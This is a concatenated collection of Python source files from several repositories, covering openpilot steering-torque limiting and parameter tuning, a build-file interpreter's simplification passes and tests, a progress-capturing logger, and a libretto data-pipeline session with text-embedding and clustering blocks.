if len(processed_entry) == 0:
print('Invalid list entry. Try again.')
print('')
continue
if len(processed_entry) != len(rtt_params[key]):
print('New list length does not match length of original list. Try again.')
print('')
continue
elif isDigit(entry):
if original_param_is_list:
print('Original value was list, new value entered is a float. Try again.')
print('')
continue
processed_entry = float(entry)
else:
print('Invalid value entered. Try again.')
print('')
continue
print('New value:')
if isDigit(processed_entry):
print(' {0}: {1:.6f}'.format(key, processed_entry))
else:
# must be a list.
print(' {0}: {1}'.format(key, processed_entry))
print('')
confirm = raw_input('Type "y" to confirm + save or any other key to escape: ')
if confirm.lower() == 'y':
print('Confirmed. Writing to real-time tuning file.')
print('')
# Set it to this value
rtt_params[key] = processed_entry
# Save the file
with open(rt_tuning_file, "wb") as f_write:
pickle.dump(rtt_params, f_write, -1) # Dump to file with highest protocol (fastest)
else:
print('Escaped!')
print('')
``` |
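The script expects `/data/.openpilot_rtt_params.pkl` to exist already. Below is a sketch of seeding it; the parameter names and values are made up for illustration and are not real openpilot tuning keys.
```python
# Sketch only: parameter names/values are illustrative, not real tuning keys.
import pickle

rt_tuning_file = '/data/.openpilot_rtt_params.pkl'
rtt_params = {
    'steer_kp': 0.15,
    'steer_ki': 0.05,
    'mpc_path_weights': [1.0, 0.5, 0.25],
}
with open(rt_tuning_file, "wb") as f:
    pickle.dump(rtt_params, f, -1)
```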
{
"source": "johnwaynerobot/openpilot",
"score": 2
} |
#### File: selfdrive/car/__init__.py
```python
from common.numpy_fast import clip
def dbc_dict(pt_dbc, radar_dbc, chassis_dbc=None):
return {'pt': pt_dbc, 'radar': radar_dbc, 'chassis': chassis_dbc}
#2018.09.04 #TODO need to define one where command steering angle instead of torque
def apply_std_steer_torque_limits(apply_torque, apply_torque_last, driver_torque, LIMITS):
# limits due to driver torque
driver_max_torque = LIMITS.STEER_MAX + (LIMITS.STEER_DRIVER_ALLOWANCE + driver_torque * LIMITS.STEER_DRIVER_FACTOR) * LIMITS.STEER_DRIVER_MULTIPLIER
driver_min_torque = -LIMITS.STEER_MAX + (-LIMITS.STEER_DRIVER_ALLOWANCE + driver_torque * LIMITS.STEER_DRIVER_FACTOR) * LIMITS.STEER_DRIVER_MULTIPLIER
max_steer_allowed = max(min(LIMITS.STEER_MAX, driver_max_torque), 0)
min_steer_allowed = min(max(-LIMITS.STEER_MAX, driver_min_torque), 0)
apply_torque = clip(apply_torque, min_steer_allowed, max_steer_allowed)
# slow rate if steer torque increases in magnitude
if apply_torque_last > 0:
apply_torque = clip(apply_torque, max(apply_torque_last - LIMITS.STEER_DELTA_DOWN, -LIMITS.STEER_DELTA_UP),
apply_torque_last + LIMITS.STEER_DELTA_UP)
else:
apply_torque = clip(apply_torque, apply_torque_last - LIMITS.STEER_DELTA_UP,
min(apply_torque_last + LIMITS.STEER_DELTA_DOWN, LIMITS.STEER_DELTA_UP))
return int(round(apply_torque))
``` |
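A sketch of how a car controller might call the helper above. The `Limits` values are illustrative only, not any real car's tuning; they just show the rate limiting in action.
```python
# Sketch only: limit values are illustrative, not real car parameters.
class Limits:
    STEER_MAX = 255
    STEER_DELTA_UP = 10
    STEER_DELTA_DOWN = 25
    STEER_DRIVER_ALLOWANCE = 50
    STEER_DRIVER_MULTIPLIER = 1
    STEER_DRIVER_FACTOR = 1

last_torque = 0
requested_torque = 200   # torque asked for by lateral control
driver_torque = 5        # torque measured on the steering wheel

applied = apply_std_steer_torque_limits(requested_torque, last_torque, driver_torque, Limits())
# With last_torque == 0 the ramp-up limit dominates, so applied == 10 here.
assert applied <= last_torque + Limits.STEER_DELTA_UP
```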
{
"source": "johnwbyrd/brakefile",
"score": 2
} |
#### File: bkl/interpreter/passes.py
```python
import os.path
import logging
logger = logging.getLogger("bkl.pass")
import simplify
import analyze
import bkl.vartypes
import bkl.expr
import bkl.model
import bkl.vartypes
from bkl.error import Error, NonConstError, TypeError
from bkl.expr import RewritingVisitor
from bkl.utils import memoized
def detect_potential_problems(model):
"""
Run several warnings-generating steps, to detect common problems.
"""
analyze.detect_self_references(model)
analyze.detect_unused_vars(model)
analyze.detect_missing_generated_outputs(model)
def normalize_and_validate_bool_subexpressions(model):
"""
    Normalizes bool expressions, i.e. ensures the conditions are valid bools.
"""
logger.debug("checking boolean expressions")
for var in model.all_variables():
bkl.vartypes.normalize_and_validate_bool_subexpressions(var.value)
def normalize_vars(model):
"""
Normalizes variables' values with respect to their types. For example,
changes non-list value expressions for lists into single-item lists.
"""
logger.debug("normalizing variables")
for var in model.all_variables():
# if the type of the variable wasn't determined yet, guess it
if var.type is bkl.vartypes.TheAnyType:
var.type = bkl.vartypes.guess_expr_type(var.value)
# normalize the value for the type
var.value = var.type.normalize(var.value)
def validate_vars(model):
"""
Validates variables' values with respect to their types, i.e. check
the correctness of the values. It is assumed that normalize_vars() was
executed beforehand.
"""
logger.debug("checking types of variables")
for var in model.all_variables():
try:
var.type.validate(var.value)
except TypeError as err:
# TODO: add this as a remark to the error object
err.msg = "variable \"%s\" (%s): %s" % (var.name, var.type, err.msg)
raise
def remove_disabled_model_parts(model, toolset):
"""
Removes disabled targets, source files etc. from the model. Disabled parts
are those with ``condition`` variable evaluating to false.
"""
def _should_remove(part, allow_dynamic):
try:
return not part.should_build()
except NonConstError:
if allow_dynamic:
return False
else:
raise
def _remove_from_list(parts, allow_dynamic):
to_del = []
for p in parts:
if _should_remove(p, allow_dynamic):
to_del.append(p)
for p in to_del:
logger.debug("removing disabled %s from %s", p, p.parent)
parts.remove(p)
for module in model.modules:
targets_to_del = []
for target in module.targets.itervalues():
if _should_remove(target, allow_dynamic=True):
targets_to_del.append(target)
continue
_remove_from_list(target.sources, allow_dynamic=True)
_remove_from_list(target.headers, allow_dynamic=True)
for target in targets_to_del:
logger.debug("removing disabled %s", target)
del module.targets[target.name]
# remove any empty submodules:
mods_to_del = []
for module in model.modules:
if module is model.top_module:
continue
if not list(module.submodules) and not module.targets:
logger.debug("removing empty %s", module)
mods_to_del.append(module)
continue
mod_toolsets = module.get_variable_value("toolsets")
if toolset not in mod_toolsets.as_py():
logger.debug("removing %s, because it isn't for toolset %s (is for: %s)",
module, toolset, mod_toolsets.as_py())
mods_to_del.append(module)
for module in mods_to_del:
model.modules.remove(module)
# and remove unused settings too:
settings_to_del = []
for sname, setting in model.settings.iteritems():
if _should_remove(setting, allow_dynamic=False):
settings_to_del.append(sname)
for sname in settings_to_del:
logger.debug("removing setting %s", sname)
del model.settings[sname]
class PathsNormalizer(RewritingVisitor):
"""
Normalizes relative paths so that they are absolute. Paths relative to
@srcdir are rewritten in terms of @top_srcdir. Paths relative to @builddir
are translated in toolset-specific way. This is needed so that cross-module
variables and paths uses produce correct results.
You must call :meth:`set_context()` to associate a module or target before
calling :meth:`visit()`. Paths relative to @builddir can only be processed
if the context was set to a target.
"""
def __init__(self, project, toolset=None):
super(PathsNormalizer, self).__init__()
self.toolset = toolset
self.project = project
self.module = self.target = None
self.top_srcdir = os.path.abspath(project.top_module.srcdir)
def set_context(self, context):
"""
Sets context to perform the translation in. This is either a module or
target from the model.
Note that @builddir cannot be translated without a target context.
"""
if isinstance(context, bkl.model.Target):
self.module = context.parent
self.target = context
else:
self.module = context
self.target = None
@memoized
def _src_prefix(self, source_file):
srcdir = os.path.abspath(self.project.get_srcdir(source_file))
prefix = os.path.relpath(srcdir, start=self.top_srcdir)
logger.debug('translating paths from %s with prefix "%s"', source_file, prefix)
if prefix == ".":
return None
else:
lst = prefix.split(os.path.sep)
return [bkl.expr.LiteralExpr(i) for i in lst]
@memoized
def _builddir(self, target):
builddir = self.toolset.get_builddir_for(target)
logger.debug('translating @builddir paths of %s into %s', target, builddir)
return builddir
def path(self, e):
if e.anchor == bkl.expr.ANCHOR_BUILDDIR and self.toolset is not None:
if self.target is None:
raise Error("@builddir references are not allowed outside of targets", pos=e.pos)
bdir = self._builddir(self.target)
e = bkl.expr.PathExpr(bdir.components + e.components,
bdir.anchor, bdir.anchor_file,
pos=e.pos)
if e.anchor == bkl.expr.ANCHOR_SRCDIR:
assert self.module is not None
if e.anchor_file:
source_file = e.anchor_file
elif e.pos and e.pos.filename:
source_file = e.pos.filename
else:
source_file = self.module.source_file
prefix = self._src_prefix(source_file)
components = e.components
if prefix is not None:
# Don't mess the path if it starts with user setting and so
# should be treated as absolute.
if not e.is_external_absolute():
components = prefix + components
e = bkl.expr.PathExpr(components,
bkl.expr.ANCHOR_TOP_SRCDIR, None,
pos=e.pos)
return e
def normalize_paths_in_model(model, toolset):
"""
Normalizes relative paths so that they are absolute. Paths relative to
@srcdir are rewritten in terms of @top_srcdir. Paths relative to @builddir
are translated in toolset-specific way. This is needed so that cross-module
variables and paths uses produce correct results.
Performs the normalization in-place for the whole model.
"""
logger.debug("translating relative paths into absolute")
if toolset is not None:
toolset = bkl.api.Toolset.get(toolset)
norm = PathsNormalizer(model, toolset)
for module in model.modules:
norm.set_context(module)
for var in module.variables.itervalues():
var.value = norm.visit(var.value)
for target in module.targets.itervalues():
norm.set_context(target)
for var in target.all_variables():
var.value = norm.visit(var.value)
def make_variables_for_missing_props(model, toolset):
"""
Creates variables for properties that don't have variables set yet.
"""
logger.debug("adding properties' default values (%s)" % model)
model.make_variables_for_missing_props(toolset)
for part in model.child_parts():
make_variables_for_missing_props(part, toolset)
def simplify_exprs(model):
"""
Simplify expressions in the model. This does "cheap" simplifications such
as merging concatenated literals, recognizing always-false conditions,
eliminating unnecessary variable references (turn ``foo=$(x);bar=$(foo)``
into ``bar=$(x)``) etc.
"""
logger.debug("simplifying expressions")
simplifier = simplify.BasicSimplifier()
for var in model.all_variables():
var.value = simplifier.visit(var.value)
def eliminate_superfluous_conditionals(model):
"""
Removes as much of conditional content as possible. This involves doing
as many optimizations as possible, even if the calculation is relatively
expensive (compared to simplify_exprs()).
"""
iteration = 1
simplifier = simplify.ConditionalsSimplifier()
while True:
logger.debug("removing superfluous conditional expressions: pass %i", iteration)
modified = False
for var in model.all_variables():
old = var.value
var.value = simplifier.visit(var.value)
if old is not var.value:
logger.debug("new pass triggered because of this change: {%s} -> {%s}", old, var.value)
modified = True
if modified:
iteration += 1
else:
break
```
#### File: bkl/interpreter/simplify.py
```python
from bkl.expr import *
from bkl.error import NonConstError
class BasicSimplifier(RewritingVisitor):
"""
Simplify expression *e*. This does "cheap" simplifications such
as merging concatenated literals, recognizing always-false conditions,
eliminating unnecessary variable references (turn ``foo=$(x);bar=$(foo)``
into ``bar=$(x)``) etc.
"""
def list(self, e):
new, changed = self._process_children(e.items)
if not changed:
return e
if len(new):
return ListExpr(new, pos=e.pos)
else:
return NullExpr(pos=e.pos)
def concat(self, e):
# merge concatenated literals:
items, changed = self._process_children(e.items)
if not changed:
return e
if len(items) == 0:
return NullExpr(pos=e.pos)
out = [items[0]]
for i in items[1:]:
if isinstance(i, LiteralExpr) and isinstance(out[-1], LiteralExpr):
out[-1] = LiteralExpr(out[-1].value + i.value)
else:
out.append(i)
if len(out) == 1:
return out[0]
else:
return ConcatExpr(out, pos=e.pos)
def reference(self, e):
# Simple reference can be replaced with the referenced value. Do this
# for (scalar) literals and other references only, though -- if the
# value is e.g. a list, we want to keep it as a variable to avoid
# duplication of large values.
#
        # NOTE: We *must not* do this for PathExpr instances with @builddir
        #       anchors, because they are replaced with absolute versions only
        #       after a toolset-specific model is made. But it doesn't make
        #       sense to substitute paths; generally speaking, they tend to be
        #       larger.
ref = e.get_value()
if (isinstance(ref, LiteralExpr) or
isinstance(ref, ReferenceExpr) or
isinstance(ref, BoolValueExpr)):
return self.visit(ref)
else:
return e
def path(self, e):
components, changed = self._process_children(e.components)
if not changed:
return e
if not components:
return NullExpr(pos=e.pos)
else:
return PathExpr(components, e.anchor, e.anchor_file, pos=e.pos)
def bool(self, e):
left = self.visit(e.left)
right = None if e.right is None else self.visit(e.right)
if left is e.left and right is e.right:
return e
else:
if (isinstance(left, NullExpr) and
(right is None or isinstance(right, NullExpr))):
return NullExpr(pos=e.pos)
else:
return BoolExpr(e.operator, left, right, pos=e.pos)
def if_(self, e):
cond = self.visit(e.cond)
yes = self.visit(e.value_yes)
no = self.visit(e.value_no)
if cond is e.cond and yes is e.value_yes and no is e.value_no:
return e
else:
if isinstance(yes, NullExpr) and isinstance(no, NullExpr):
return NullExpr(pos=e.pos)
else:
return IfExpr(cond, yes, no, pos=e.pos)
class ConditionalsSimplifier(BasicSimplifier):
"""
More advanced simplifier class, eliminates const boolean expressions
and their consequences (such as null items in lists).
"""
def bool(self, e):
e = super(ConditionalsSimplifier, self).bool(e)
if not isinstance(e, BoolExpr):
return e
op = e.operator
try:
# Note: any of the as_py() calls below may throw, because the
# subexpression may be non-const. That's OK, it just means we
# cannot simplify the expression yet, so we just catch that
# particular exception, NonConstError, later.
if op == BoolExpr.NOT:
return BoolValueExpr(not e.left.as_py(), pos=e.pos)
elif op == BoolExpr.AND:
# We can simplify AND expressions even if one part is undeterminable
left = right = None
try:
left = e.left.as_py()
except NonConstError:
pass
try:
right = e.right.as_py()
except NonConstError:
pass
if left is not None and right is not None:
return BoolValueExpr(left and right, pos=e.pos)
elif left is not None and left == True:
return e.right
elif right is not None and right == True:
return e.left
elif op == BoolExpr.OR:
# We can simplify OR expressions even if one part is undeterminable
left = right = None
try:
left = e.left.as_py()
if left:
return BoolValueExpr(True, pos=e.pos)
except NonConstError:
pass
try:
right = e.right.as_py()
if right:
return BoolValueExpr(True, pos=e.pos)
except NonConstError:
pass
if left is not None and right is not None:
assert (left or right) == False
return BoolValueExpr(False, pos=e.pos)
elif op == BoolExpr.EQUAL:
return BoolValueExpr(e.left.as_py() == e.right.as_py())
elif op == BoolExpr.NOT_EQUAL:
return BoolValueExpr(e.left.as_py() != e.right.as_py())
except NonConstError:
pass
return e
def if_(self, e):
e = super(ConditionalsSimplifier, self).if_(e)
if not isinstance(e, IfExpr):
return e
try:
if e.cond.as_py():
return e.value_yes
else:
return e.value_no
except NonConstError:
return e
def simplify(e):
"""
Simplifies given expression as much as possible, employing all tricks in
the book.
Currently, that means applying ConditionalsSimplifier on it.
"""
return ConditionalsSimplifier().visit(e)
```
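A small sketch of the constant folding this pass performs, built from the same expression classes used elsewhere in this repository; the literal values are illustrative.
```python
# Sketch only: demonstrates constant folding of an IfExpr with a constant condition.
from bkl.expr import IfExpr, BoolValueExpr, LiteralExpr
from bkl.interpreter.simplify import simplify

e = IfExpr(BoolValueExpr(True), LiteralExpr("debug"), LiteralExpr("release"))
print(simplify(e))   # the conditional collapses to the "debug" literal
```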
#### File: projects/generated_files/make_gensrc.py
```python
import sys
import os.path
if len(sys.argv) != 4:
raise RuntimeError("invalid arguments, usage: %s --<both|header|source> output input" % sys.argv[0])
def gen_header(outname):
dirname, basename = os.path.split(outname)
name, ext = os.path.splitext(basename)
with file(os.path.join(dirname, name + ".h"), "wt") as outf:
outf.write("extern const char *get_%s_body();\n" % name)
def gen_source(outname, msg):
dirname, basename = os.path.split(outname)
name, ext = os.path.splitext(basename)
with file(os.path.join(dirname, name + ".cpp"), "wt") as outf:
with file(msg, "rt") as inpf:
outf.write("const char *get_%s_body() { return \"" % name + inpf.read().rstrip('\n') + "\"; }\n")
if sys.argv[1] == "--both":
gen_header(sys.argv[2])
gen_source(sys.argv[2], sys.argv[3])
elif sys.argv[1] == "--header":
gen_header(sys.argv[2])
elif sys.argv[1] == "--source":
gen_source(sys.argv[2], sys.argv[3])
else:
raise RuntimeError("invalid argument %s" % sys.argv[1])
```
#### File: brakefile/tests/test_plumbing.py
```python
import os.path
import bkl.interpreter
import bkl.dumper
import bkl.io
from bkl.expr import BoolValueExpr, ListExpr, LiteralExpr, ConcatExpr, NullExpr
import projects
projects_dir = os.path.dirname(projects.__file__)
class InterpreterForTestSuite(bkl.interpreter.Interpreter):
def generate(self):
pass
def test_model_cloning():
i = InterpreterForTestSuite()
i.process_file(os.path.join(projects_dir, 'submodules', 'main.bkl'))
model = i.model
model_copy = model.clone()
model_txt = bkl.dumper.dump_project(model)
model_copy_txt = bkl.dumper.dump_project(model_copy)
assert model_txt == model_copy_txt
def test_file_io_unix(tmpdir):
p = tmpdir.join("textfile")
f = bkl.io.OutputFile(str(p), bkl.io.EOL_UNIX)
f.write("one\ntwo\n")
f.commit()
text_read = p.read("rb")
assert text_read == "one\ntwo\n"
def test_file_io_win(tmpdir):
p = tmpdir.join("textfile")
f = bkl.io.OutputFile(str(p), bkl.io.EOL_WINDOWS)
f.write("one\ntwo\n")
f.commit()
text_read = p.read("rb")
assert text_read == "one\r\ntwo\r\n"
def test_expr_as_bool():
bool_yes = BoolValueExpr(True)
bool_no = BoolValueExpr(False)
empty_list = ListExpr([])
a_list = ListExpr([bool_yes, bool_no])
literal = LiteralExpr("foo")
empty_literal = LiteralExpr("")
concat = ConcatExpr([empty_literal, literal, literal])
empty_concat = ConcatExpr([empty_literal, empty_literal])
assert bool(bool_yes)
assert bool(a_list)
assert bool(literal)
assert bool(concat)
assert not bool(bool_no)
assert not bool(empty_list)
assert not bool(empty_literal)
assert not bool(empty_concat)
def test_list_expr_iterator():
bool_yes = BoolValueExpr(True)
bool_no = BoolValueExpr(False)
empty_list = ListExpr([])
a_list = ListExpr([bool_yes, bool_no])
assert len(empty_list) == 0
assert not empty_list
assert len(a_list) == 2
assert a_list
assert list(a_list) == [bool_yes, bool_no]
null = NullExpr()
assert not null
assert len(null) == 0
``` |
{
"source": "johnwcchau/ABC",
"score": 3
} |
#### File: johnwcchau/ABC/util.py
```python
from contextlib import redirect_stdout, redirect_stderr
import re
class Logger:
def __init__(self):
self.ws = None
self.ioloop = None
def log(self, status=-1000, msg=None, param=None):
if self.ws and self.ioloop:
self.ioloop.add_callback(self.ws.send_result, status, msg, param)
def working(self, msg=None):
self.log(1, msg)
def progress(self, msg=None, progress=0):
if isinstance(progress, float) or isinstance(progress, int):
self.log(2, msg, {"progress": progress})
elif isinstance(progress, dict):
self.log(2, msg, progress)
else:
self.log(2, msg)
def finished(self, msg=None, param=None):
self.log(0, msg, param)
def busy(self):
self.log(-997, "Model is busy, try again later")
def error(self, msg=None):
self.log(-998, msg)
def invalid(self, msg='Invalid request'):
self.log(-999, msg)
def stream(self, stream, msg):
self.log(stream, msg)
class outwriter(object):
def __init__(self, log:Logger):
self.log = log
pass
def write(self, data):
self.log.stream(2, repr(data))
def flush(self):
pass
class errwriter(object):
def __init__(self, log:Logger):
self.log = log
    @staticmethod
    def tqnum(s:str)->float:
if not s: return 1
num = 1
try:
if s[-1] in ["K", "M", "G", "T"]:
num = float(s[:-1])
else:
num = float(s)
if s[-1]=="K":
num *= 1024
elif s[-1]=="M":
num *= 1024 * 1024
elif s[-1]=="G":
num *= 1024 * 1024 * 1024
elif s[-1]=="T":
num *= 1024*1024*1024*1024
except Exception:
return 1
pass
def write(self, data):
#
# try to capture tqdm output
#
tq = re.search(r'(([^:]+): ?)?([0-9]+)%\|[^\|]+\| ?([0-9GKMT]+)\/([0-9GKMT]+) ?\[([0-9:]+)<([0-9:]+), ?([^\]]+)', data.replace('\r', ''))
if tq:
desc = tq.group(2)
if desc is None: desc = "In progress"
progress = float(tq.group(4)) / float(tq.group(5))
ellipsed = tq.group(6)
remain = tq.group(7)
speed = tq.group(8)
msg = "\\r%s: %.1f%%" % (desc, progress * 100)
if '\n' in data: msg += "\\n"
self.log.progress(msg, {
'progress': progress,
'ellipsed': ellipsed,
'remain': remain,
'speed': speed
})
else:
tq = re.search(r'(([^:]+): ?)?([0-9]+)%\|[^\|]+\| ?([0-9GKMT]+)\/([0-9GKMT]+) ?\[([0-9:]+)', data.replace('\r', ''))
if tq:
desc = tq.group(2)
if desc is None: desc = "In progress"
progress = float(tq.group(4)) / float(tq.group(5))
ellipsed = tq.group(6)
msg = "\\r%s: %.1f%%" % (desc, progress * 100)
self.log.progress(msg, {
'progress': progress,
'ellipsed': ellipsed,
})
else:
self.log.stream(3, repr(data))
def flush(self):
pass
class LogRedirect:
#out_redirected = False
def __init__(self, log:Logger):
# self.log = log
self.stdout = redirect_stdout(outwriter(log))
self.stderr = redirect_stderr(errwriter(log))
def __enter__(self):
LogRedirect.out_redirected += 1
# self.log.working("out_redirected")
self.stderr.__enter__()
self.stdout.__enter__()
def __exit__(self, exctype, excinst, exctb):
self.stderr.__exit__(exctype, excinst, exctb)
self.stdout.__exit__(exctype, excinst, exctb)
LogRedirect.out_redirected -= 1
if LogRedirect.out_redirected < 0: LogRedirect.out_redirected = 0
# self.log.working("out_not_redirected %r" % LogRedirect.out_redirected)
LogRedirect.out_redirected = 0
``` |
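The first regular expression in `errwriter.write` targets tqdm's progress lines. Here is a sketch of what it captures from one such line; the sample line is made up to look like typical tqdm stderr output.
```python
# Sketch only: sample_line imitates a typical tqdm stderr line.
import re

sample_line = "train: 40%|####      | 40/100 [00:10<00:15, 4.00it/s]"
tq = re.search(r'(([^:]+): ?)?([0-9]+)%\|[^\|]+\| ?([0-9GKMT]+)\/([0-9GKMT]+) ?\[([0-9:]+)<([0-9:]+), ?([^\]]+)',
               sample_line)
print(tq.group(2))                 # 'train'          -> description
print(tq.group(4), tq.group(5))    # '40' '100'       -> completed / total
print(tq.group(6), tq.group(7))    # '00:10' '00:15'  -> elapsed / remaining
print(tq.group(8))                 # '4.00it/s'       -> speed
```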
{
"source": "johnwcchau/libretto",
"score": 2
} |
#### File: libretto/plugin/__init__.py
```python
import logging
from configparser import ConfigParser
from typing import Callable
__plugins = {}
def plugin_disabled(config, path):
name = '.'.join(path.replace('/', '.').replace('\\', '.').split('.')[:-2])
return config.getboolean(name, "disabled", fallback=False)
def plugin_mjs(config):
from glob import glob
with open("libretto/plugin/plugins.mjs", "w") as file:
for path in glob("libretto/plugin/**/__init__.mjs"):
if plugin_disabled(config, path): continue
path = path[8:].replace("\\", "/")
name = path.split('/')[-2]
file.write(f'import {{}} from "{path}";\n');
file.write("""
export default function plugin_css() {
""")
for name in glob("libretto/plugin/**/__init__.css"):
name = name[4:].replace("\\", "/")
file.write(f"""
$("head").append('<link rel="stylesheet" href="{name}" type="text/css" />');
""")
file.write("""
}""")
def init(config):
from importlib import import_module
from os import path
import logging
from glob import glob
global __plugins
for path in glob("libretto/plugin/**/__init__.py"):
name = '.'.join(path.replace('/', '.').replace('\\', '.').split('.')[:-2])
logging.info(f'Discovered plugin {name}')
if plugin_disabled(config, path):
logging.info(f'{name}: Disabled in config and not loaded')
continue
try:
lib = import_module(f'{name}.__init__')
if hasattr(lib, "__init_plugin"):
getattr(lib, "__init_plugin")(config)
__plugins[name] = lib
except Exception as e:
logging.error(repr(e))
def dispatch(lamda:Callable[[str, object], None]):
global __plugins
for name, plugin in __plugins.items():
lamda(name, plugin)
def find_plugin(plugin:str):
global __plugins
return __plugins[plugin] if plugin in __plugins else None
```
#### File: plugin/transformer/block.py
```python
from sentence_transformers import SentenceTransformer
from umap import UMAP
import hdbscan
import pandas as pd
from libretto.baseblock import Block, ErrorAtRun, Parent, Loop, RunSpec
from libretto.inout import StdRedirect
#
# cache models
#
models = {}
class TransformerBlock(Block):
def __init__(self, **kwargs: dict) -> None:
super().__init__(**kwargs)
self.kwargs = kwargs
self.model_name = kwargs["model"] if "model" in kwargs else None
self.model = None
self.previews = None
def dump(self) -> dict:
return self.kwargs
def run(self, runspec: RunSpec, x: pd.DataFrame, y=None, id=None) -> tuple:
if len(x.columns) > 1:
raise ValueError("input must be a single column of text")
x = x[x.columns[0]]
if x.hasnans:
raise ValueError("input contains empty value, please drop or impute")
if self.model is None:
global models
if self.model_name in models:
self.model = models[self.model_name]
else:
runspec.out.working(f'Create embedding model {self.model_name}', {"atblock": self.name})
with StdRedirect(runspec.out, atblock=self.name):
import torch
device = "cuda" if torch.cuda.is_available() else "cpu"
runspec.out.working(f'Embedding to be done on {device}', {"atblock": self.name})
self.model = SentenceTransformer(self.model_name, device=device)
models[self.model_name] = self.model
#
# Encoding is slow, try best to cache
if runspec.mode in [RunSpec.RunMode.PREVIEW, RunSpec.RunMode.COLUMNS]:
if self.previews is None:
self.previews = self.model.encode(x.values.tolist(), show_progress_bar=True)
result = self.previews
else:
result = self.model.encode(x.values.tolist(), show_progress_bar=True)
return pd.DataFrame(result), y, id
class UMAPBlock(Block):
def __init__(self, **kwargs: dict) -> None:
super().__init__(**kwargs)
self.kwargs = kwargs
self.umap_param = kwargs["umap_param"] if "umap_param" in kwargs else None
self.model = None
self.previews = None
def dump(self) -> dict:
return self.kwargs
def run(self, runspec: RunSpec, x: pd.DataFrame, y=None, id=None) -> tuple:
if self.model is None:
with StdRedirect(runspec.out, atblock=self.name):
self.model = UMAP(**self.umap_param)
if runspec.mode in [RunSpec.RunMode.PREVIEW, RunSpec.RunMode.COLUMNS]:
if self.previews is None:
self.model.fit(x.values.tolist(), y)
self.previews = pd.DataFrame(self.model.transform(x.values.tolist()))
result = self.previews
else:
if runspec.mode not in [RunSpec.RunMode.TEST, RunSpec.RunMode.RUN]:
self.model.fit(x.values.tolist(), y)
result = pd.DataFrame(self.model.transform(x.values.tolist()))
return result, y, id
class HDBSCANBlock(Block):
def __init__(self, **kwargs: dict) -> None:
super().__init__(**kwargs)
self.kwargs = kwargs
self.initkargs = kwargs["initkargs"] if "initkargs" in kwargs else {}
self.model = None
self.previews = None
def dump(self) -> dict:
return self.kwargs
def run(self, runspec: RunSpec, x: pd.DataFrame, y=None, id=None) -> tuple:
if self.model is None:
self.model = hdbscan.HDBSCAN(**self.initkargs)
if runspec.mode in [RunSpec.RunMode.PREVIEW, RunSpec.RunMode.COLUMNS]:
if self.previews is None:
self.model.fit(x.values.tolist())
self.previews = pd.DataFrame({0: self.model.labels_})
result = self.previews
elif runspec.mode == RunSpec.RunMode.TRAIN:
self.model.fit(x.values.tolist())
result = pd.DataFrame({0: self.model.labels_})
else:
result, _ = hdbscan.approximate_predict(self.model, x.values.tolist())
result = pd.DataFrame(result)
return result, y, id
```
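The three blocks are normally wired together by the libretto recipe runner, but they can be exercised directly for experimentation. Below is a sketch only, assuming the `Block` base constructor accepts a `name` keyword and that `RunSpec` can be built the same way `libretto.session` builds it; the model name and tuning values are illustrative.
```python
# Sketch only: constructor kwargs, model name and parameters are assumptions.
import pandas as pd
from libretto.baseblock import RunSpec
from libretto.inout import Output

embed = TransformerBlock(name="embed", model="all-MiniLM-L6-v2")
reducer = UMAPBlock(name="umap", umap_param={"n_components": 2, "n_neighbors": 3})
cluster = HDBSCANBlock(name="hdbscan", initkargs={"min_cluster_size": 2})

spec = RunSpec(mode=RunSpec.RunMode.TRAIN, upto=None, out=Output())
x = pd.DataFrame({"text": [
    "a cat sat on the mat", "a dog ran in the park", "kittens and puppies",
    "stocks fell sharply", "markets rallied today", "the index closed higher",
]})

x, y, ids = embed.run(spec, x)
x, y, ids = reducer.run(spec, x, y, ids)
labels, _, _ = cluster.run(spec, x, y, ids)
print(labels)   # one cluster label per input row (-1 means noise)
```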
#### File: libretto/libretto/session.py
```python
import traceback
from .baseblock import Block, ErrorAtRun, RunSpec, EvalLocals
from .inout import Output
from .plugin import dispatch, find_plugin
import pandas as pd
import numpy as np
import logging
import re
class Session:
__sessions = {}
def __new__(cls, name:str):
if name not in Session.__sessions:
logging.info(f'Creating new session {name}')
s = object.__new__(Session)
s.__init(name)
Session.__sessions[name] = s
dispatch(lambda _, obj: getattr(obj, "__new_session")(name) if hasattr(obj, "__new_session") else None)
else:
s = Session.__sessions[name]
return s
def __init(self, name:str) -> None:
self.name = name
self.rootblock:Block = None
self.out:Output = Output()
self.runspec:RunSpec = None
self._result:tuple = None
def _attach(self, ws):
if self.out.ws is not None and self.out.ws != ws:
raise RuntimeError(f'Session is occupied')
self.out.ws = ws
def _detach(self):
self.out.ws = None
def plugin_invoke(self, plugin:str, action:str, **params):
try:
if action.startswith("__"):
self.out.invalid()
return
plugin = find_plugin(plugin)
if plugin is None or not hasattr(plugin, action):
self.out.invalid()
return
action = getattr(plugin, action)
if not callable(action):
self.out.invalid()
return
action(session=self.name, writer=self.out, **params)
except Exception as e:
            logging.error(repr(e))
self.out.error(repr(e))
def run(self, mode:str, upto:str, **kwargs)->None:
try:
if self.rootblock is None:
raise RuntimeError('No receipe')
self.out.working(f'{mode} upto {upto if upto else "end"}...')
self.runspec = RunSpec(mode=RunSpec.RunMode[mode.upper()], upto=upto, out=self.out)
self._result = self.rootblock(self.runspec, None)
self.out.finished("Finished")
except ErrorAtRun as e:
logging.exception(e.exception, exc_info=True)
self.out.error(repr(e.exception), {"atblock": e.at.name})
except Exception as e:
logging.exception(e, exc_info=True)
self.out.error(repr(e))
def __genstat(self):
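        # Summarise the current result: describe() per column plus unique counts,
        # correlation with y (when available), median, skew and dtype rows,
        # returned as one record per column.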
data:pd.DataFrame = self._result[0]
result:pd.DataFrame = data.describe(include="all")
def fillunique(x:pd.Series):
if "unique" in x and np.isnan(x["unique"]):
x["unique"] = len(data[x.name].unique())
return x
result = result.transform(fillunique, axis=0)
try:
if self._result[1] is not None:
result.loc[len(result.index)] = data.corrwith(self._result[1])
result = result.rename(index={
len(result.index)-1 : "corr"
})
except TypeError:
pass
result.loc[len(result.index)] = data.median()
result.loc[len(result.index)] = data.skew()
result.loc[len(result.index)] = data.dtypes.astype(str)
result = result.rename(index={
len(result.index)-3 : "median",
len(result.index)-2 : "skew",
len(result.index)-1 : "dtype",
}).transpose().reset_index().rename(columns={"index": "column"})
return result.where(pd.notnull(result), None).to_dict(orient="records")
def formatforplotly(self, result:pd.DataFrame, plotspec:list):
traces = []
for spec in plotspec:
datapts = result
if "filter" in spec:
if spec["filter"]:
datapts = datapts.query(spec["filter"])
del spec["filter"]
if "groupby" in spec and len(spec["groupby"]):
datagroups = datapts.groupby(spec["groupby"])
else:
if "groupby" in spec:
del spec["groupby"]
def v():
yield "", datapts
datagroups = v()
#
            # separate const, aggr and cols
#
cols = []
